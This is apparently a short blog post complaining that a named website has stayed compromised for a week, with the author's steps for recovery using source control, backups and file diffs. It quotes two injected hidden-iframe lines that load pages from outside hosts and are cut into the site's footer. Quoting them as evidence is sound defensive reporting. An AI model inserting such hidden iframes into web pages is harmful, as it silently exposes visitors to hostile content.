It is just inexcusable to leave hacked or virused sites up and running. Either fix them or take them down.
A site that I have visited a lot recently (alienscientist.com) has been having what looks like an I-Frame injection problem. The following two lines are injected ahead of the footer on all their webpages:
<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php frameborder='0' scrolling='no'></iframe></div>
<div style='display:none'><iframe width='9' height='6' src='http://t-tapp.com/od.php' frameborder='0'
Jesus Christos (pronouned "Hay Suesss") it has been a week since the site was infected. Get with the program.
1. The entire site should be under source control - virus programs don't have the intelligence to operate a source control program and contaminate prior versions of the site.
2. Since normally only new files a pushed when doing an update - check the new files.
3. If a virus/hacking problem occurs - check the update console and the server for virus/hack problems throughly before attempting cleanup. If your update system has problems:
a. unplug the network
b. recover from the previous backup.
c. change passwords.
d. retest for inflection.
e. reconnect to the network.
4. After the update system is solid - do a diff (comparison) of the site to the source control version and push the incorrect files. Check the files that are only on the server - to make sure they are generated or came from a known source.
As a side note - the HTML code above caused all kinds of problems in the post until all the special characters were escaped. The missing </div> tag causes the remainder of the post to disappear - but that is the least of the problems.
No comments:
Post a Comment